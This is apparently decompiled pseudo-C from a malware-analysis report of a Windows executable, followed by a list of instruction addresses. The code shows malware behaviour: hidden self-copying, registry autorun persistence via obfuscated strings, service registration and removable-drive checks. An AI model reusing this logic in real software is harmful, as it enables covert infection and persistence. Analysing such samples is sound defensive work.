				char _t294;
				CHAR* _t303;
				int _t304;
				char _t309;
				CHAR* _t312;
				char _t318;
				int _t324;
				CHAR* _t325;
				char _t328;
				char* _t331;
				char _t332;
				char _t340;
				char _t344;
				CHAR* _t357;
				CHAR* _t358;
				int _t359;
				int _t373;
				long _t379;
				void* _t383;
				void* _t396;
				void* _t401;
				char _t402;
				char _t403;
				intOrPtr* _t410;
				void* _t411;
				char _t417;
				char _t418;
				void* _t424;
				intOrPtr _t426;
				void* _t428;
				char* _t436;
				intOrPtr _t441;
				CHAR* _t442;
				void* _t450;
				void* _t451;
				char _t459;
				void* _t464;
				void* _t465;
				void* _t467;
				void* _t468;
				void* _t469;
				void* _t470;
				void* _t471;
				void* _t474;
				intOrPtr _t475;

				SetErrorMode(3); // executed
				SetErrorMode(3); // executed
				SetUnhandledExceptionFilter(E00406511); // executed
				E0040EC54(); // executed
				_t475 =  *0x41201f; // 0x0
				if(_t475 != 0) {
					__eflags =  *0x4133d8;
					if(__eflags == 0) {
						L126:
						CreateThread(0, 0, E0040405E, 0, 0, 0);
						__imp__#115(0x1010,  &_v1672);
						E0040E52E(_t449, __eflags);
						E0040EAAF(1, 0);
						E00401D96(_t438, 0x412118);
						E004080C9(_t438);
						CreateThread(0, 0, E0040877E, 0, 0, 0);
						E00405E6C(__eflags);
						E00403132();
						E0040C125(__eflags);
						E00408DB1(_t438);
						Sleep(0xbb8);
						E0040C4EE();
						while(1) {
							__eflags =  *0x4133d0;
							if( *0x4133d0 == 0) {
								goto L129;
							}
							_t239 = GetTickCount();
							__eflags = _t239 -  *0x4133d0 - 0x109a0;
							if(_t239 -  *0x4133d0 < 0x109a0) {
								L131:
								Sleep(0x1a90);
								continue;
							}
							L129:
							_t238 = E0040C913();
							__eflags = _t238;
							if(_t238 == 0) {
								 *0x4133d0 = GetTickCount();
							}
							goto L131;
						}
					}
					_a12 = 0xa;
					while(1) {
						_t242 = DeleteFileA(0x4133d8);
						__eflags = _t242;
						if(_t242 != 0) {
							break;
						}
						__eflags = _a12;
						if(_a12 <= 0) {
							break;
						}
						_t244 = GetLastError();
						__eflags = _t244 - 2;
						if(_t244 == 2) {
							break;
						}
						_t219 =  &_a12;
						 *_t219 = _a12 - 1;
						__eflags =  *_t219;
						Sleep(0x3e8);
					}
					E0040EE2A(_t438, 0x4133d8, 0, 0x104);
					_t465 = _t465 + 0xc;
					goto L126;
				} else {
					_v12 = 0;
					if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) == 0) {
						_v672 = 0;
					}
					if(_v672 == 0x22) {
						E0040EF00( &_v672,  &_v671);
						_t436 = E0040ED23( &_v672, 0x22);
						_t465 = _t465 + 0x10;
						if(_t436 != 0) {
							 *_t436 = 0;
						}
					}
					_t248 = GetCommandLineA();
					_t459 = 0x4122f8;
					_a12 = _t248;
					_t250 = E0040EE95(_a12, E00402544(0x4122f8, 0x410a48, 4, 0xe4, 0xc8));
					_t454 = 0x100;
					_v8 = _t250;
					E0040EE2A(_t438, 0x4122f8, 0, 0x100);
					_t467 = _t465 + 0x28;
					if(_v8 == 0) {
						_t257 = E004096AA( &_v672,  &_v48,  &_v44,  &_v372,  &_v112); // executed
						_t467 = _t467 + 0x14;
						_v16 = _t257;
						if(_t257 == 0) {
							E0040EF00(0x4121a8,  &_v672);
							_pop(_t438);
							_a12 = GetCommandLineA();
							_v8 = E0040EE95(_a12, E00402544(0x4122f8, 0x410a38, 4, 0xe4, 0xc8));
							E0040EE2A(_t438, 0x4122f8, 0, 0x100);
							_t468 = _t467 + 0x28;
							__eflags = _v8;
							if(_v8 == 0) {
								L102:
								_v8 = E0040EE95(_a12, E00402544(_t459, 0x410a28, 4, 0xe4, 0xc8));
								E0040EE2A(_t438, _t459, 0, _t454);
								_t467 = _t468 + 0x28;
								__eflags = _v8;
								if(_v8 == 0) {
									L110:
									_t267 = E00406EC3();
									__eflags = _t267;
									if(_t267 != 0) {
										E004098F2(_t438);
										L19:
										ExitProcess(0); // executed
									}
									__eflags = _v372;
									if(_v372 == 0) {
										L116:
										 *0x4133b0 = 0;
										L117:
										_v64.hProcess =  &_v372;
										_v64.hThread = E00409961;
										_v64.dwProcessId = 0;
										_v64.dwThreadId = 0;
										StartServiceCtrlDispatcherA( &_v64);
										goto L19;
									}
									_t272 =  &_v372;
									_t449 = _t272 + 1;
									do {
										_t438 =  *_t272;
										_t272 = _t272 + 1;
										__eflags = _t438;
									} while (_t438 != 0);
									__eflags = _t272 - _t449 - 0x20;
									if(_t272 - _t449 >= 0x20) {
										goto L116;
									}
									E0040EF00(0x4133b0,  &_v372);
									_pop(_t438);
									goto L117;
								}
								_t459 = _v8 + 3;
								_t276 = E0040ED03(_t459, 0x20);
								_pop(_t438);
								__eflags = _t276;
								if(_t276 != 0) {
									L107:
									_t454 = _t276 - _t459;
									__eflags = _t454 - 0x20;
									if(_t454 >= 0x20) {
										_t454 = 0x1f;
									}
									E0040EE08(0x412184, _t459, _t454);
									_t467 = _t467 + 0xc;
									 *((char*)(_t454 + 0x412184)) = 0;
									goto L110;
								}
								_t279 = _t459;
								_t449 = _t279 + 1;
								do {
									_t438 =  *_t279;
									_t279 = _t279 + 1;
									__eflags = _t438;
								} while (_t438 != 0);
								_t276 = _t279 - _t449 + _t459;
								__eflags = _t276;
								goto L107;
							}
							_t282 = _v8 + 3;
							_v672 = 0;
							__eflags =  *_t282 - 0x22;
							_v20 = _t282;
							if( *_t282 != 0x22) {
								_t283 = E0040ED03(_v20, 0x20);
								_pop(_t438);
								__eflags = _t283;
								if(_t283 == 0) {
									_t283 =  &(_a12[lstrlenA(_a12)]);
									__eflags = _t283;
								}
								_t284 = _t283 - _v8;
								_v24 = _t284;
								__eflags = _t284 + 0xfffffffd;
								E0040EE08( &_v672, _v20, _t284 + 0xfffffffd);
								 *((char*)(_t464 + _v24 - 0x29f)) = 0;
								L98:
								_t468 = _t468 + 0xc;
								L99:
								__eflags = _v672;
								if(_v672 != 0) {
									E0040EE08(0x4133d8,  &_v672, 0x103);
									_t468 = _t468 + 0xc;
								}
								 *0x412cc0 = 1;
								goto L102;
							}
							_v20 = _v8 + 4;
							_t294 = E0040ED03(_v8 + 4, 0x22);
							_pop(_t438);
							__eflags = _t294;
							if(_t294 == 0) {
								goto L99;
							}
							_v24 = _t294 - _v8;
							E0040EE08( &_v672, _v20, _t294 - _v8 + 0xfffffffc);
							 *((char*)(_t464 + _v24 - 0x2a0)) = 0;
							goto L98;
						}
						_v36 = 0;
						if(_t257 >= 4 || _v48 > 0x5e && _v44 != 0) {
							L84:
							if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) != 0) {
								_t303 =  &_v672;
								if(_v672 == 0x22) {
									_t303 =  &_v671;
								}
								if(_t303[1] == 0x3a && _t303[2] == 0x5c) {
									_t303[3] = 0;
									_t304 = GetDriveTypeA(_t303);
									_t515 = _t304 - 2;
									if(_t304 != 2) {
										E00409145(_t515);
										_t438 = 1;
									}
								}
							}
							goto L19;
						} else {
							E00404280(_t438, 1); // executed
							_pop(_t438);
							if(_v672 == 0) {
								goto L84;
							}
							_t309 = E0040675C( &_v672,  &_v12, 0); // executed
							_t467 = _t467 + 0xc;
							_v8 = _t309;
							if(_t309 == 0 || _v12 == 0) {
								goto L84;
							} else {
								_v32 = 0;
								_v28 = 0;
								if(_v16 == 2) {
									L55:
									__eflags = _v16 - 3;
									if(_v16 >= 3) {
										L83:
										E0040EC2E(_v8);
										_pop(_t438);
										if(_v36 != 0) {
											goto L19;
										}
										goto L84;
									}
									_t312 = E00402544(_t459, 0x410a3c, 0xc, 0xe4, 0xc8);
									_t469 = _t467 + 0x14;
									__eflags = GetEnvironmentVariableA(_t312,  &_v1272, 0x1f4);
									if(__eflags == 0) {
										L82:
										E0040EE2A(_t438, _t459, 0, _t454);
										_t467 = _t469 + 0xc;
										goto L83;
									}
									_t318 = E004099D2(_t449, __eflags,  &_v1272,  &_v672,  &_v704, _v8, _v12);
									_t469 = _t469 + 0x14;
									__eflags = _t318;
									if(_t318 == 0) {
										goto L82;
									}
									E0040EE2A(_t438, _t459, 0, _t454);
									_t470 = _t469 + 0xc;
									_v1272 = 0x22;
									lstrcpyA( &_v1271,  &_v672);
									_t324 = lstrlenA( &_v1272);
									 *((char*)(_t464 + _t324 - 0x4f4)) = 0x22;
									_t325 = _t324 + 1;
									__eflags = _v16 - 2;
									_a12 = _t325;
									 *((char*)(_t464 + _t325 - 0x4f4)) = 0;
									if(_v16 != 2) {
										L60:
										_push(0);
										_push( &_v112);
										_t328 = E00406DC2(_t438) ^ 0x5e5e5e5e;
										__eflags = _t328;
										_push(_t328);
										E0040F133();
										_t470 = _t470 + 0xc;
										L61:
										_t331 = E00402544(_t459,  &E004106AC, 0x2e, 0xe4, 0xc8);
										_t471 = _t470 + 0x14;
										_t332 = RegOpenKeyExA(0x80000001, _t331, 0, 0x103,  &_v24);
										_v20 = _t332;
										__eflags = _t332;
										if(_t332 == 0) {
											_t373 =  &(_a12[1]);
											__eflags = _t373;
											_v20 = RegSetValueExA(_v24,  &_v112, 0, 1,  &_v1272, _t373);
											RegCloseKey(_v24);
										}
										E0040EE2A(_t438, _t459, 0, _t454);
										E0040EE2A(_t438,  &_v772, 0, 0x44);
										_v772.cb = 0x44;
										E0040EE2A(_t438,  &_v64, 0, 0x10);
										_t469 = _t471 + 0x24;
										_t340 = GetModuleFileNameA(GetModuleHandleA(0),  &_v372, 0x104);
										__eflags = _t340;
										if(_t340 != 0) {
											__eflags = _v372 - 0x22;
											_t357 =  &_v372;
											_v40 = _t357;
											if(_v372 == 0x22) {
												_t357 =  &_v371;
												_v40 = _t357;
											}
											__eflags =  *((char*)(_t357 + 1)) - 0x3a;
											if( *((char*)(_t357 + 1)) == 0x3a) {
												__eflags =  *((char*)(_t357 + 2)) - 0x5c;
												if( *((char*)(_t357 + 2)) == 0x5c) {
													_t358 = _v40;
													_t438 = _t358[3];
													_a15 = _t358[3];
													_t358[3] = 0;
													_t359 = GetDriveTypeA(_t358);
													__eflags = _t359 - 2;
													if(_t359 != 2) {
														_t438 = _v40;
														_v40[3] = _a15;
														lstrcatA( &_v1272, E00402544(_t459, 0x410a38, 4, 0xe4, 0xc8));
														E0040EE2A(_v40, _t459, 0, _t454);
														_t469 = _t469 + 0x20;
														__eflags = _v372 - 0x22;
														if(_v372 != 0x22) {
															lstrcatA( &_v1272, "\"");
														}
														lstrcatA( &_v1272,  &_v372);
														__eflags = _v372 - 0x22;
														if(_v372 != 0x22) {
															lstrcatA( &_v1272, "\"");
														}
														_v36 = 1;
													}
												}
											}
										}
										__eflags = _v32;
										if(_v32 != 0) {
											__eflags = _v28;
											if(_v28 != 0) {
												wsprintfA( &_v372, "%X%08X", _v28, _v32);
												lstrcatA( &_v1272, E00402544(_t459, 0x410a28, 4, 0xe4, 0xc8));
												E0040EE2A(_t438, _t459, 0, _t454);
												_t469 = _t469 + 0x30;
												lstrcatA( &_v1272,  &_v372);
											}
										}
										_t344 = CreateProcessA(0,  &_v1272, 0, 0, 0, 0x8000000, 0, 0,  &_v772,  &_v64);
										__eflags = _t344;
										if(_t344 == 0) {
											DeleteFileA( &_v672);
											_v36 = 0;
										}
										__eflags = _v16 - 1;
										if(_v16 == 1) {
											__eflags = _v20;
											if(_v20 == 0) {
												E004096FF(_t438);
											}
										}
										goto L82;
									}
									__eflags = _v112;
									if(_v112 != 0) {
										goto L61;
									}
									goto L60;
								}
								_t379 = GetTempPathA(0x1f4,  &_v1272);
								_t494 = _t379;
								if(_t379 == 0) {
									goto L55;
								}
								_t383 = E004099D2(_t449, _t494,  &_v1272,  &_v672,  &_v704, _v8, _v12); // executed
								_t467 = _t467 + 0x14;
								if(_t383 == 0) {
									goto L55;
								}
								_v80 = 0;
								if(_v16 < 3 || _v372 == 0) {
									_push(0);
									_push( &_v80);
									_push(E00406DC2(_t438) ^ 0x5e5e5e5e);
									E0040F133();
									_t474 = _t467 + 0xc;
									lstrcpyA( &_v372, E00406CC9(_t438));
									lstrcatA( &_v372,  &_v80);
									lstrcatA( &_v372,  &E0041070C);
									_t396 = 0;
									__eflags = 0;
									goto L43;
								} else {
									_t410 =  &_v372;
									_t450 = _t410 + 1;
									do {
										_t441 =  *_t410;
										_t410 = _t410 + 1;
									} while (_t441 != 0);
									_t411 = _t410 - _t450;
									if(_t411 > 0 &&  *((char*)(_t464 + _t411 - 0x171)) == 0x5c) {
										_t411 = _t411 - 1;
									}
									_t451 = _t411;
									if(_t411 <= 0) {
										L41:
										_t449 = _t451 - _t411;
										_a12 = _t451 - _t411;
										E0040EE08( &_v80, _t464 + _t411 - 0x170, _t451 - _t411);
										 *((char*)(_t464 + _a12 - 0x4c)) = 0;
										_t474 = _t467 + 0xc;
										_t396 = 1;
										L43:
										if(_v44 == 0 || _v48 < 0x50) {
											_t438 = 1;
											__eflags = 1;
										} else {
											_t438 = 0;
										}
										_push(_t438);
										_push(_t396);
										_push( &_v372);
										_push( &_v80);
										_push( &_v672);
										_push( &_v704);
										_t401 = E00409326(_t438, _t449);
										_t467 = _t474 + 0x18;
										if(_t401 == 0) {
											_t402 =  *0x41217c; // 0x0
											_v32 = _t402;
											_t403 =  *0x412180; // 0x0
											goto L54;
										} else {
											if(GetFileAttributesExA( &_v672, 0,  &(_v772.dwXCountChars)) != 0) {
												_t403 = 0x5e0d0108;
												 *0x412180 = 0x5e0d0108;
												 *0x41217c = 0;
												_v32 = 0;
												L54:
												_v28 = _t403;
												DeleteFileA( &_v672);
												goto L55;
											}
											_t459 = 1;
											if(_v16 == 1) {
												E004096FF(_t438);
											}
											_v36 = _t459;
											goto L83;
										}
									} else {
										_t442 =  &_v372;
										while( *((char*)(_t442 + _t411 - 1)) != 0x5c) {
											_t411 = _t411 - 1;
											if(_t411 > 0) {
												continue;
											}
											goto L41;
										}
										goto L41;
									}
								}
							}
						}
					}
					_t417 = _v8;
					_t454 = _t417 + 3;
					_v372 = 0;
					if( *((char*)(_t417 + 3)) != 0x22) {
						_t418 = E0040ED03(_t454, 0x20);
						_pop(_t438);
						__eflags = _t418;
						if(_t418 == 0) {
							_t418 =  &(_a12[lstrlenA(_a12)]);
							__eflags = _t418;
						}
						_t459 = _t418 - _v8;
						__eflags = _t459;
						E0040EE08( &_v372, _t454, _t459 - 3);
						 *((char*)(_t464 + _t459 - 0x173)) = 0;
						L13:
						_t467 = _t467 + 0xc;
						L14:
						if(_v372 != 0 && _v672 != 0) {
							_t424 = E0040675C( &_v672,  &_v12, 0);
							_t467 = _t467 + 0xc;
							if(_t424 != 0 && _v12 != 0) {
								_t426 = E00406A60(_t449,  &_v372, _t424, _v12);
								_t467 = _t467 + 0xc;
								_v12 = _t426;
							}
						}
						goto L19;
					}
					_t454 = _t417 + 4;
					_t428 = E0040ED03(_t417 + 4, 0x22);
					_pop(_t438);
					if(_t428 == 0) {
						goto L14;
					} else {
						_t459 = _t428 - _v8;
						E0040EE08( &_v372, _t454, _t459 - 4);
						 *((char*)(_t464 + _t459 - 0x174)) = 0;
						goto L13;
					}
				}
			}





















































































                                                                                                                                  0x00409a7f
                                                                                                                                  0x00409a83
                                                                                                                                  0x00409a8a
                                                                                                                                  0x00409a90
                                                                                                                                  0x00409a97
                                                                                                                                  0x00409a9d
                                                                                                                                  0x0040a3cc
                                                                                                                                  0x0040a3d2
                                                                                                                                  0x0040a41c
                                                                                                                                  0x0040a42c
                                                                                                                                  0x0040a43a
                                                                                                                                  0x0040a440
                                                                                                                                  0x0040a448
                                                                                                                                  0x0040a452
                                                                                                                                  0x0040a45a
                                                                                                                                  0x0040a469
                                                                                                                                  0x0040a46b
                                                                                                                                  0x0040a470
                                                                                                                                  0x0040a475
                                                                                                                                  0x0040a47a
                                                                                                                                  0x0040a48a
                                                                                                                                  0x0040a48c
                                                                                                                                  0x0040a497
                                                                                                                                  0x0040a497
                                                                                                                                  0x0040a49d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a49f
                                                                                                                                  0x0040a4a7
                                                                                                                                  0x0040a4ac
                                                                                                                                  0x0040a4be
                                                                                                                                  0x0040a4c3
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a4c3
                                                                                                                                  0x0040a4ae
                                                                                                                                  0x0040a4ae
                                                                                                                                  0x0040a4b3
                                                                                                                                  0x0040a4b5
                                                                                                                                  0x0040a4b9
                                                                                                                                  0x0040a4b9
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a4b5
                                                                                                                                  0x0040a497
                                                                                                                                  0x0040a3da
                                                                                                                                  0x0040a406
                                                                                                                                  0x0040a407
                                                                                                                                  0x0040a409
                                                                                                                                  0x0040a40b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a3e8
                                                                                                                                  0x0040a3eb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a3ed
                                                                                                                                  0x0040a3f3
                                                                                                                                  0x0040a3f6
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a3f8
                                                                                                                                  0x0040a3f8
                                                                                                                                  0x0040a3f8
                                                                                                                                  0x0040a400
                                                                                                                                  0x0040a400
                                                                                                                                  0x0040a414
                                                                                                                                  0x0040a419
                                                                                                                                  0x00000000
                                                                                                                                  0x00409aa3
                                                                                                                                  0x00409ab0
                                                                                                                                  0x00409ac2
                                                                                                                                  0x00409ac4
                                                                                                                                  0x00409ac4
                                                                                                                                  0x00409ad1
                                                                                                                                  0x00409ae1
                                                                                                                                  0x00409aef
                                                                                                                                  0x00409af4
                                                                                                                                  0x00409af9
                                                                                                                                  0x00409afb
                                                                                                                                  0x00409afb
                                                                                                                                  0x00409af9
                                                                                                                                  0x00409afd
                                                                                                                                  0x00409b14
                                                                                                                                  0x00409b1a
                                                                                                                                  0x00409b26
                                                                                                                                  0x00409b2b
                                                                                                                                  0x00409b33
                                                                                                                                  0x00409b36
                                                                                                                                  0x00409b3b
                                                                                                                                  0x00409b41
                                                                                                                                  0x00409c26
                                                                                                                                  0x00409c2b
                                                                                                                                  0x00409c2e
                                                                                                                                  0x00409c33
                                                                                                                                  0x0040a1de
                                                                                                                                  0x0040a1e4
                                                                                                                                  0x0040a1fd
                                                                                                                                  0x0040a211
                                                                                                                                  0x0040a214
                                                                                                                                  0x0040a219
                                                                                                                                  0x0040a21c
                                                                                                                                  0x0040a21f
                                                                                                                                  0x0040a2e2
                                                                                                                                  0x0040a305
                                                                                                                                  0x0040a308
                                                                                                                                  0x0040a30d
                                                                                                                                  0x0040a310
                                                                                                                                  0x0040a313
                                                                                                                                  0x0040a35a
                                                                                                                                  0x0040a35a
                                                                                                                                  0x0040a35f
                                                                                                                                  0x0040a361
                                                                                                                                  0x0040a3c2
                                                                                                                                  0x00409c05
                                                                                                                                  0x00409c06
                                                                                                                                  0x00409c06
                                                                                                                                  0x0040a363
                                                                                                                                  0x0040a369
                                                                                                                                  0x0040a397
                                                                                                                                  0x0040a397
                                                                                                                                  0x0040a39d
                                                                                                                                  0x0040a3a3
                                                                                                                                  0x0040a3aa
                                                                                                                                  0x0040a3b1
                                                                                                                                  0x0040a3b4
                                                                                                                                  0x0040a3b7
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a3b7
                                                                                                                                  0x0040a36b
                                                                                                                                  0x0040a371
                                                                                                                                  0x0040a374
                                                                                                                                  0x0040a374
                                                                                                                                  0x0040a376
                                                                                                                                  0x0040a377
                                                                                                                                  0x0040a377
                                                                                                                                  0x0040a37d
                                                                                                                                  0x0040a380
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a38e
                                                                                                                                  0x0040a394
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a394
                                                                                                                                  0x0040a318
                                                                                                                                  0x0040a31e
                                                                                                                                  0x0040a324
                                                                                                                                  0x0040a325
                                                                                                                                  0x0040a327
                                                                                                                                  0x0040a339
                                                                                                                                  0x0040a33b
                                                                                                                                  0x0040a33d
                                                                                                                                  0x0040a340
                                                                                                                                  0x0040a344
                                                                                                                                  0x0040a344
                                                                                                                                  0x0040a34c
                                                                                                                                  0x0040a351
                                                                                                                                  0x0040a354
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a354
                                                                                                                                  0x0040a329
                                                                                                                                  0x0040a32b
                                                                                                                                  0x0040a32e
                                                                                                                                  0x0040a32e
                                                                                                                                  0x0040a330
                                                                                                                                  0x0040a331
                                                                                                                                  0x0040a331
                                                                                                                                  0x0040a337
                                                                                                                                  0x0040a337
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a337
                                                                                                                                  0x0040a228
                                                                                                                                  0x0040a22b
                                                                                                                                  0x0040a231
                                                                                                                                  0x0040a234
                                                                                                                                  0x0040a237
                                                                                                                                  0x0040a27a
                                                                                                                                  0x0040a280
                                                                                                                                  0x0040a281
                                                                                                                                  0x0040a283
                                                                                                                                  0x0040a28e
                                                                                                                                  0x0040a28e
                                                                                                                                  0x0040a28e
                                                                                                                                  0x0040a291
                                                                                                                                  0x0040a294
                                                                                                                                  0x0040a297
                                                                                                                                  0x0040a2a5
                                                                                                                                  0x0040a2ad
                                                                                                                                  0x0040a2b4
                                                                                                                                  0x0040a2b4
                                                                                                                                  0x0040a2b7
                                                                                                                                  0x0040a2b7
                                                                                                                                  0x0040a2bd
                                                                                                                                  0x0040a2d0
                                                                                                                                  0x0040a2d5
                                                                                                                                  0x0040a2d5
                                                                                                                                  0x0040a2d8
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a2d8
                                                                                                                                  0x0040a242
                                                                                                                                  0x0040a245
                                                                                                                                  0x0040a24b
                                                                                                                                  0x0040a24c
                                                                                                                                  0x0040a24e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a253
                                                                                                                                  0x0040a264
                                                                                                                                  0x0040a26c
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a26c
                                                                                                                                  0x00409c39
                                                                                                                                  0x00409c3f
                                                                                                                                  0x0040a167
                                                                                                                                  0x0040a183
                                                                                                                                  0x0040a190
                                                                                                                                  0x0040a196
                                                                                                                                  0x0040a198
                                                                                                                                  0x0040a198
                                                                                                                                  0x0040a1a2
                                                                                                                                  0x0040a1b3
                                                                                                                                  0x0040a1b6
                                                                                                                                  0x0040a1bc
                                                                                                                                  0x0040a1bf
                                                                                                                                  0x0040a1c7
                                                                                                                                  0x0040a1cc
                                                                                                                                  0x0040a1cc
                                                                                                                                  0x0040a1bf
                                                                                                                                  0x0040a1a2
                                                                                                                                  0x00000000
                                                                                                                                  0x00409c54
                                                                                                                                  0x00409c56
                                                                                                                                  0x00409c5b
                                                                                                                                  0x00409c62
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00409c74
                                                                                                                                  0x00409c79
                                                                                                                                  0x00409c7c
                                                                                                                                  0x00409c81
                                                                                                                                  0x00000000
                                                                                                                                  0x00409c90
                                                                                                                                  0x00409c94
                                                                                                                                  0x00409c97
                                                                                                                                  0x00409c9a
                                                                                                                                  0x00409e3e
                                                                                                                                  0x00409e3e
                                                                                                                                  0x00409e42
                                                                                                                                  0x0040a155
                                                                                                                                  0x0040a158
                                                                                                                                  0x0040a15d
                                                                                                                                  0x0040a161
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a161
                                                                                                                                  0x00409e66
                                                                                                                                  0x00409e6b
                                                                                                                                  0x00409e75
                                                                                                                                  0x00409e77
                                                                                                                                  0x0040a14a
                                                                                                                                  0x0040a14d
                                                                                                                                  0x0040a152
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a152
                                                                                                                                  0x00409e98
                                                                                                                                  0x00409e9d
                                                                                                                                  0x00409ea0
                                                                                                                                  0x00409ea2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00409eab
                                                                                                                                  0x00409eb0
                                                                                                                                  0x00409ec1
                                                                                                                                  0x00409ec8
                                                                                                                                  0x00409ed5
                                                                                                                                  0x00409edb
                                                                                                                                  0x00409ee3
                                                                                                                                  0x00409ee4
                                                                                                                                  0x00409ee8
                                                                                                                                  0x00409eeb
                                                                                                                                  0x00409ef2
                                                                                                                                  0x00409ef9
                                                                                                                                  0x00409efc
                                                                                                                                  0x00409efd
                                                                                                                                  0x00409f03
                                                                                                                                  0x00409f03
                                                                                                                                  0x00409f08
                                                                                                                                  0x00409f09
                                                                                                                                  0x00409f0e
                                                                                                                                  0x00409f11
                                                                                                                                  0x00409f2d
                                                                                                                                  0x00409f32
                                                                                                                                  0x00409f3b
                                                                                                                                  0x00409f41
                                                                                                                                  0x00409f44
                                                                                                                                  0x00409f46
                                                                                                                                  0x00409f4b
                                                                                                                                  0x00409f4b
                                                                                                                                  0x00409f67
                                                                                                                                  0x00409f6a
                                                                                                                                  0x00409f6a
                                                                                                                                  0x00409f73
                                                                                                                                  0x00409f82
                                                                                                                                  0x00409f8e
                                                                                                                                  0x00409f98
                                                                                                                                  0x00409f9d
                                                                                                                                  0x00409fb4
                                                                                                                                  0x00409fba
                                                                                                                                  0x00409fbc
                                                                                                                                  0x00409fc2
                                                                                                                                  0x00409fc9
                                                                                                                                  0x00409fcf
                                                                                                                                  0x00409fd2
                                                                                                                                  0x00409fd4
                                                                                                                                  0x00409fda
                                                                                                                                  0x00409fda
                                                                                                                                  0x00409fdd
                                                                                                                                  0x00409fe1
                                                                                                                                  0x00409fe7
                                                                                                                                  0x00409feb
                                                                                                                                  0x00409ff1
                                                                                                                                  0x00409ff4
                                                                                                                                  0x00409ff8
                                                                                                                                  0x00409ffb
                                                                                                                                  0x00409ffe
                                                                                                                                  0x0040a004
                                                                                                                                  0x0040a007
                                                                                                                                  0x0040a010
                                                                                                                                  0x0040a025
                                                                                                                                  0x0040a038
                                                                                                                                  0x0040a041
                                                                                                                                  0x0040a046
                                                                                                                                  0x0040a049
                                                                                                                                  0x0040a050
                                                                                                                                  0x0040a05e
                                                                                                                                  0x0040a05e
                                                                                                                                  0x0040a072
                                                                                                                                  0x0040a078
                                                                                                                                  0x0040a07f
                                                                                                                                  0x0040a08d
                                                                                                                                  0x0040a08d
                                                                                                                                  0x0040a093
                                                                                                                                  0x0040a093
                                                                                                                                  0x0040a007
                                                                                                                                  0x00409feb
                                                                                                                                  0x00409fe1
                                                                                                                                  0x0040a09a
                                                                                                                                  0x0040a09d
                                                                                                                                  0x0040a09f
                                                                                                                                  0x0040a0a2
                                                                                                                                  0x0040a0b6
                                                                                                                                  0x0040a0de
                                                                                                                                  0x0040a0e7
                                                                                                                                  0x0040a0ec
                                                                                                                                  0x0040a0fd
                                                                                                                                  0x0040a0fd
                                                                                                                                  0x0040a0a2
                                                                                                                                  0x0040a120
                                                                                                                                  0x0040a126
                                                                                                                                  0x0040a128
                                                                                                                                  0x0040a131
                                                                                                                                  0x0040a137
                                                                                                                                  0x0040a137
                                                                                                                                  0x0040a13a
                                                                                                                                  0x0040a13e
                                                                                                                                  0x0040a140
                                                                                                                                  0x0040a143
                                                                                                                                  0x0040a145
                                                                                                                                  0x0040a145
                                                                                                                                  0x0040a143
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a13e
                                                                                                                                  0x00409ef4
                                                                                                                                  0x00409ef7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00409ef7
                                                                                                                                  0x00409cac
                                                                                                                                  0x00409cb2
                                                                                                                                  0x00409cb4
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00409cd5
                                                                                                                                  0x00409cda
                                                                                                                                  0x00409cdf
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00409ce9
                                                                                                                                  0x00409cec
                                                                                                                                  0x00409d58
                                                                                                                                  0x00409d59
                                                                                                                                  0x00409d64
                                                                                                                                  0x00409d65
                                                                                                                                  0x00409d6a
                                                                                                                                  0x00409d7a
                                                                                                                                  0x00409d8b
                                                                                                                                  0x00409d9d
                                                                                                                                  0x00409da3
                                                                                                                                  0x00409da3
                                                                                                                                  0x00000000
                                                                                                                                  0x00409cf6
                                                                                                                                  0x00409cf6
                                                                                                                                  0x00409cfc
                                                                                                                                  0x00409cff
                                                                                                                                  0x00409cff
                                                                                                                                  0x00409d01
                                                                                                                                  0x00409d02
                                                                                                                                  0x00409d06
                                                                                                                                  0x00409d0a
                                                                                                                                  0x00409d16
                                                                                                                                  0x00409d16
                                                                                                                                  0x00409d17
                                                                                                                                  0x00409d1b
                                                                                                                                  0x00409d2f
                                                                                                                                  0x00409d2f
                                                                                                                                  0x00409d3e
                                                                                                                                  0x00409d41
                                                                                                                                  0x00409d49
                                                                                                                                  0x00409d4f
                                                                                                                                  0x00409d52
                                                                                                                                  0x00409da5
                                                                                                                                  0x00409da8
                                                                                                                                  0x00409db6
                                                                                                                                  0x00409db6
                                                                                                                                  0x00409db0
                                                                                                                                  0x00409db0
                                                                                                                                  0x00409db0
                                                                                                                                  0x00409db7
                                                                                                                                  0x00409db8
                                                                                                                                  0x00409dbf
                                                                                                                                  0x00409dc3
                                                                                                                                  0x00409dca
                                                                                                                                  0x00409dd1
                                                                                                                                  0x00409dd2
                                                                                                                                  0x00409dd7
                                                                                                                                  0x00409ddc
                                                                                                                                  0x00409e21
                                                                                                                                  0x00409e26
                                                                                                                                  0x00409e29
                                                                                                                                  0x00000000
                                                                                                                                  0x00409dde
                                                                                                                                  0x00409df5
                                                                                                                                  0x00409e0c
                                                                                                                                  0x00409e11
                                                                                                                                  0x00409e16
                                                                                                                                  0x00409e1c
                                                                                                                                  0x00409e2e
                                                                                                                                  0x00409e2e
